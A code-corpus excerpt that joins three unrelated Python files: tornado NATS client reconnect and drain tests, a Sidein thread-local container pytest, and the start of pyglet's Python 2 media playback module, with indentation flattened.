for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
srvs = {}
for item in nc.discovered_servers:
srvs[item.uri.port] = True
self.assertTrue(2 <= len(srvs.keys()) <= 3)
srvs = {}
for item in nc.servers:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
# Terminate the first server and wait for reconnect
nats1.finish()
yield tornado.gen.with_timeout(
timedelta(seconds=1), reconnected_future)
# Check if the connection is ok
received = tornado.concurrent.Future()
@tornado.gen.coroutine
def handler(msg):
received.set_result(msg)
yield nc.subscribe("foo", cb=handler)
yield nc.flush()
yield nc.publish("foo", b'bar')
yield tornado.gen.with_timeout(
timedelta(seconds=1), received)
final_uri = nc.connected_url
self.assertNotEqual(initial_uri, final_uri)
yield nc.close()
class ClientDrainTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server = Gnatsd(port=4225, http_port=8225)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch('http://127.0.0.1:8225/varz')
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientDrainTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientDrainTest, self).tearDown()
@tornado.testing.gen_test
def test_drain_closes_connection(self):
nc = Client()
future = tornado.concurrent.Future()
@tornado.gen.coroutine
def closed_cb():
future.set_result(True)
@tornado.gen.coroutine
def cb(msg):
pass
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
)
yield nc.subscribe("foo", cb=cb)
yield nc.subscribe("bar", cb=cb)
yield nc.subscribe("quux", cb=cb)
yield nc.drain()
yield tornado.gen.with_timeout(timedelta(seconds=1), future)
self.assertEqual(0, len(nc._subs))
self.assertTrue(True, nc.is_closed)
@tornado.testing.gen_test
def test_drain_invalid_subscription(self):
nc = NATS()
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
)
msgs = []
@tornado.gen.coroutine
def cb(msg):
msgs.append(msg)
yield nc.subscribe("foo", cb=cb)
yield nc.subscribe("bar", cb=cb)
yield nc.subscribe("quux", cb=cb)
with self.assertRaises(ErrBadSubscription):
yield nc.drain(sid=4)
yield nc.close()
self.assertTrue(nc.is_closed)
@tornado.testing.gen_test
def test_drain_single_subscription(self):
nc = NATS()
yield nc.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def handler(msg):
msgs.append(msg)
if len(msgs) == 10:
yield tornado.gen.sleep(0.5)
sid = yield nc.subscribe("foo", cb=handler)
for i in range(0, 200):
yield nc.publish("foo", b'hi')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc.flush()
sub = nc._subs[sid]
before_drain = sub.pending_queue.qsize()
self.assertTrue(before_drain > 0)
drain_task = yield nc.drain(sid=sid)
yield tornado.gen.with_timeout(timedelta(seconds=1), drain_task)
for i in range(0, 200):
yield nc.publish("foo", b'hi')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
# No more messages should have been processed.
after_drain = sub.pending_queue.qsize()
self.assertEqual(0, after_drain)
self.assertEqual(200, len(msgs))
yield nc.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
@tornado.testing.gen_test(timeout=15)
def test_drain_connection(self):
nc = NATS()
errors = []
drain_done = tornado.concurrent.Future()
def disconnected_cb():
pass
def reconnected_cb():
pass
def error_cb(e):
errors.append(e)
def closed_cb():
drain_done.set_result(True)
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
error_cb=error_cb,
reconnected_cb=reconnected_cb,
disconnected_cb=disconnected_cb,
)
nc2 = NATS()
yield nc2.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def foo_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "foo", b'OK!')
yield nc.flush()
@tornado.gen.coroutine
def bar_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "bar", b'OK!')
yield nc.flush()
@tornado.gen.coroutine
def quux_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "quux", b'OK!')
yield nc.flush()
sid_foo = yield nc.subscribe("foo", cb=foo_handler)
sid_bar = yield nc.subscribe("bar", cb=bar_handler)
sid_quux = yield nc.subscribe("quux", cb=quux_handler)
@tornado.gen.coroutine
def replies(msg):
msgs.append(msg)
yield nc2.subscribe("my-replies.*", cb=replies)
for i in range(0, 201):
yield nc2.publish_request("foo", "my-replies.AAA", b'help')
yield nc2.publish_request("bar", "my-replies.BBB", b'help')
yield nc2.publish_request("quux", "my-replies.CCC", b'help')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc2.flush()
sub_foo = nc._subs[sid_foo]
sub_bar = nc._subs[sid_bar]
sub_quux = nc._subs[sid_quux]
self.assertTrue(sub_foo.pending_queue.qsize() > 0)
self.assertTrue(sub_bar.pending_queue.qsize() > 0)
self.assertTrue(sub_quux.pending_queue.qsize() > 0)
# Drain and close the connection. In case of timeout then
# an async error will be emitted via the error callback.
self.io_loop.spawn_callback(nc.drain)
# Let the draining task a bit of time to run...
yield tornado.gen.sleep(0.5)
# Should be no-op or bail if connection closed.
yield nc.drain()
# State should be closed here already,
yield tornado.gen.with_timeout(timedelta(seconds=10), drain_done)
self.assertEqual(0, len(nc._subs.items()))
self.assertEqual(1, len(nc2._subs.items()))
self.assertTrue(len(msgs) > 150)
# No need to close first connection since drain reaches
# the closed state.
yield nc2.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
self.assertTrue(nc2.is_closed)
self.assertFalse(nc2.is_connected)
@tornado.testing.gen_test(timeout=15)
def test_drain_connection_timeout(self):
nc = NATS()
errors = []
drain_done = tornado.concurrent.Future()
@tornado.gen.coroutine
def error_cb(e):
errors.append(e)
@tornado.gen.coroutine
def closed_cb():
drain_done.set_result(True)
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
error_cb=error_cb,
drain_timeout=0.1,
)
nc2 = NATS()
yield nc2.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "foo", b'OK!')
yield nc.flush()
sid_foo = yield nc.subscribe("foo", cb=handler)
@tornado.gen.coroutine
def replies(msg):
msgs.append(msg)
yield nc2.subscribe("my-replies.*", cb=replies)
for i in range(0, 201):
yield nc2.publish_request("foo", "my-replies.AAA", b'help')
yield nc2.publish_request("bar", "my-replies.BBB", b'help')
yield nc2.publish_request("quux", "my-replies.CCC", b'help')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc2.flush()
# Drain and close the connection. In case of timeout then
# an async error will be emitted via the error callback.
yield nc.drain()
self.assertTrue(type(errors[0]) is ErrDrainTimeout)
# No need to close first connection since drain reaches
# the closed state.
yield nc2.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
self.assertTrue(nc2.is_closed)
self.assertFalse(nc2.is_connected)
if __name__ == '__main__':
runner = unittest.TextTestRunner(stream=sys.stdout)
unittest.main(verbosity=2, exit=False, testRunner=runner)
|
test_006_threadlocal_simple_container.py
|
#!/bin/false
# Copyright (c) 2022 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import os.path
if "SIDEIN_TESTS_AUTOPATH" in os.environ:
__TESTS_DIR = os.path.dirname(os.path.realpath(__file__))
__MODULE_DIR = os.path.realpath(os.path.join(__TESTS_DIR, ".."))
if __TESTS_DIR not in sys.path:
sys.path.insert(0, __TESTS_DIR)
if __MODULE_DIR not in sys.path:
sys.path.insert(0, __MODULE_DIR)
from typing import List
import pytest
import threading
from sidein.Sidein import Sidein
from sidein.providers.simplecontainer.ThreadLocalSimpleContainer import ThreadLocalSimpleContainer
dependency_names = (
"",
" ",
"\r\n",
"com.example.container_dependency",
"container dependency with spaces",
"řeřicha",
"Příliš žluťoučký kůň úpěl ďábelské ódy.",
"Příliš žluťoučký kůň úpěl ďábelské ódy. ",
"Příliš žluťoučký kůň úpěl ďábelské ódy.\n",
"🤍🤎",
"🕐🕑🕒🕓",
)
def make_dummy_dep(dep_name: str) -> str:
return dep_name + " dependency value"
@pytest.fixture
def container():
ns_name = __file__
ns_ = Sidein.ns(ns_name)
ns_.set_dependency_provider(ThreadLocalSimpleContainer())
yield ns_.get_dependency_provider()
Sidein.get_namespace_manager().remove_namespace(ns_name)
# As of now, the implementation of thread-local simple container differs from the global simple container only in the
# dependency storage (thread-local vs. global). As global simple container is tested too, the only thing that's tested
# here is that the thread-local storage is really thread-local.
def test_dependency_storage_thread_locality(container):
def _count_dependencies(save_count_here: List[int]) -> None:
save_count_here.append(len(container.get_all_dependencies()))
for dep_name in dependency_names:
container.add_dependency(dep_name, make_dummy_dep(dep_name))
main_dep_count, thread_dep_count = [], []
_count_dependencies(main_dep_count)
t = threading.Thread(target=_count_dependencies, args=(thread_dep_count,))
t.start()
t.join()
assert isinstance(main_dep_count[0], int)
assert isinstance(thread_dep_count[0], int)
assert main_dep_count[0] == len(dependency_names)
assert thread_dep_count[0] == 0
|
mt_media.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: $
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements a the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: __init__.py 2005 2008-04-13 01:03:03Z Alex.Holkner $'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import StringIO
import pyglet
_debug = pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
The `stop` instance variable is set to ``True`` and the condition is
notified. It is the responsibility of the `run` method to check
the value of `stop` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
# faster than fudging aruond with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string.'''
if type(self.data) is str:
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# Meaning of timestamp is dependent on context; and not seen by
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
'''
_duration = None
audio_format = None
video_format = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
# Create a dummy player for the source to push its textures onto.
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
assert image is not None
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if there are no more
video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def _seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedException(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = StringIO.StringIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = StringIO.StringIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def _seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration)
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0]._seek(time)
def queue(self, source):
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._sources.pop(0)
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0]._get_audio_data(bytes) # TODO method rename
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._sources[0]._seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0]._get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
# Timestamp is from an dequeued source... need to keep track of
# these.
raise NotImplementedError('TODO')
return timestamp
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_texture = None
_video_frame_id = -1
_video_frame_dirty = False
_video_frame_required = True
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
if not self._audio_player:
self._create_audio_player()
def play(self):
if self._audio_player:
self._audio_player.play()
self._playing = True
def pause(self):
if self._audio_player:
time = self._audio_player.get_time()
if time is not None:
self._paused_time = time
self._audio_player.stop()
self._playing = False
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._create_audio_player()
return
self._playing = False
self.dispatch_event('on_player_eos')
def seek(self, time):
self._audio_player.clear()
self._video_frame_dirty = True
self._paused_time = time
self.source.seek(time)
if self.source.video_format:
self._video_frame_required = True
self._video_frame_dirty = True
self._video_frame_id = self.source.get_next_video_frame_id()
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
else:
self._audio_player = create_silent_audio_player(group, self)
# TODO video texture create here.
if self._playing:
self._audio_player.play()
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def get_texture(self):
if not self.source:
return
if _debug:
print 'get_texture', self._video_frame_dirty
# TODO recreate texture
video_format = self.source.video_format
if video_format:
if not self._texture:
if _debug:
print 'create texture'
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
if self._video_frame_dirty:
self.update_texture()
return self._texture
def update_texture(self):
if _debug:
print 'update_texture', self._video_frame_id
image = self.source.get_video_frame(self._video_frame_id)
self._video_frame_dirty = False
if image:
# TODO avoid get_texture
if _debug:
print 'blit_into'
self.get_texture().blit_into(image, 0, 0, 0)
if _debug:
print 'update_texture -> void (dirty = %r)' % self._video_frame_dirty, self
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
